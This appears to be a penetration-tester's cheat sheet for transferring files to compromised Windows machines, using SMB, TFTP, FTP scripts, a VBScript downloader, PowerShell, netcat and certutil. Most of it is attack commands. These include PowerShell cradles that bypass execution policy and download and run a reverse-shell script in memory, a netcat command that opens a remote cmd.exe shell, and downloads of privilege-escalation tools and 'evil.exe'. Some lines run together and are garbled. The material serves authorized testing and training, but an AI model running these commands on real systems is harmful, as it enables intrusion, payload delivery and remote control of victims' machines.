😌Windows File Transfer
simple webserver
| python 2.7
python2 -m SimpleHTTPServer| python3
python3 -m http.server| ruby
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"| php
php -S 0.0.0.0:8888
Smbsever (impacket)
impacket-smbserver
copy \\<ip>\<path>\<file> # Linux to windows
copy <file> \\<ip>\<path>\ # Windows to linux
| kali:
smbserver.py myshare /tmp/smbshare -smb2| windows:
net use M: \\<kali-ip>\myshare\\10.10.10.1\privesc.exe whoami TFTP
hacker
rootkali: mkdir /tftp
root@kali: atftpd --daemon --port 69 \tftp\
root@kali: cp nc.exe \tftp| target
C:ProgramFiles\SLmail\System> tftp -i 192.168.30.5 GET nc.exe
FTP
| hacker
root@kali: apt-get install pure-ftpd
root@kali: cat setup-ftp
root@kali: ./setup-ftproot@kali: cat ftp.commands
echo open 192.168.58.5 21 > ftp.txt
echo offsec>> ftp.txt
echo lab>> ftp.txt
echo bin>> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt SCP
scp <fileToUpload> user@remote:/pathVBScript
Here is a good script to make a wget-clone in VB.
If it doesn't work try piping it through unix2dos before copying it.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbsYou then execute the script like this:
cscript wget.vbs http://192.168.10.5/evil.exe evil.exe PowerShell
| Download File to path
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://10.10.14.5/JuicyPotato.exe','C:\users\merlin\documents\potato.exe')"echo IEX(New-Object System.Net.WebClient).downloadFile('http://10.10.10.3:8000/loli.txt','C:\Users\pelado\Desktop\loli.txt') | powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile| Download testfile and executes it in the memory
powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6/Invoke-PowerShellTcp.ps1')"|powershell full path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe| powershell wget
powershell wget "http://10.10.10.10/nc.exe" -outfile "nc.exe"
nc.exe -e cmd.exe 10.10.10.10 4444wget.psl
| kali
echo $storageDir = $pwd > wget.psl
echo $webclient = New-Object System.Net.WebClient >>wget.psl
echo $url = "http://10.10.14.23:8000/PowerUp.ps1 >> wget.psl
echo $file = "new-exploit.exe" >>wget.psl
echo $webclient.DownloadFile($url,$file) >>wget.psl| target:
C:\programs> copy y pasteo lo de arriba\\
C:\programs> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.psl \\
C:\programs> dir new-exploit.exe\\
cool\\netcat
nc -lvp 1234 > <out_file>
nc <ip> 1234 < <in _file>
curl
curl <url> -o outfile
certutils
| windows
certutil.exe -urlcache -split -f "http://ip-addr:port/file" [output-file]Last updated